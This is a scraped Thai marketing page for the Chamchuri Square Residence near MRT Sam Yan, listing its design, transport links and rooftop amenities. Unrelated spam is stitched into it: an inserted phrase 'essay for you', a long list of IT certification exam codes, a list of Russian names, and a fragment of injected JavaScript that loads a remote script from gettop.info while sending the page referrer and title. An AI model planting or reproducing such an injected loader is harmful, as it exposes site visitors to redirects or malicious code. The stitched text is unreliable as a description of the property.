จัตุรัสจามจุรี เรสซิเดนซ์

Ultimate Design

อาคารได้รับการคัดเลือกและติดตั้งใช้งาน พร้อมทั้งขอและได้รับอนุญาตให้ก่อสร้างจาก กรุงเทพมหานครและมีการพิจารณาปรับปรุง ระบบหรืออุปกรณ์ต่างๆ

ให้มีความเหมาะสมและปลอดภัยอยู่เสมอ การตกแต่งเน้นคุณภาพ ความสวยงามและมีเอกลักษณ์เฉพาะตัว

building-residence11

 

 

Ultimate Convenience

เป็นโครงการแรกที่มีทางเชื่อมติดกับ รถไฟฟ้าใต้ดิน(MRT) สถานีสามยานซึ่งจะช่วย เพิ่มความสะดวกสบายในการเดินทางให้กับ ประชาชนมากขึ้น

อีกทั้งยังสามารถเดินทาง ด้วยรถยนต์ไปขึ้นทางด่วนพระราม 4 ที่ด่าน คลองเตยไปสนามบินสุวรรณภูมิ์ได้

welcome-news1icon-mrt

 

 

Ultimate Amenities

พื้นที่สิ่งอํานวยความสะดวก (Facility) ส่วนกลางของอาคารพักอาศัย essay for you ประกอบด้วย Fitness สระวายน้ำและสวนส่วนกลาง

ซึ่งตั้งอยูบนดาดฟ้าของอาคารส่วนฐาน (Podium)

pic-armen

70-177  
70-178  
70-243  
70-246  
70-270  
70-346  
70-347  
70-410  
70-411  
70-412  
70-413  
70-417  
70-461  
70-462  
70-463  
70-480  
70-483  
70-486  
70-487  
70-488  
70-532  
NS0-157  
200-355  
1Z0-060  
MB2-707  
200-310  
220-802  
70-534  
70-488  
2V0-621D  
1Z0-144  
70-480  
220-902  
70-243  
000-106  
070-461  
9A0-385  
500-260  
MB6-703  
220-801  
74-678  
CCA-500  
642-732  
300-101  
9A0-385  
200-125  ,
500-260  
70-246  
300-209  
70-413  
SSCP  
70-410  
70-980  
70-483  
NS0-157  
HP0-S42  
350-018  

 

Tel : 02 160 5301

 

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; d.getElementsByTagName(‘head’)[0].appendChild(s);topspyapps.net

questra Пестюк Чеслав Фанис Джураев Константин Мамчур Станислав Кравцов AGAM Atlantic Global Александр Прочухан Абакумов Андрей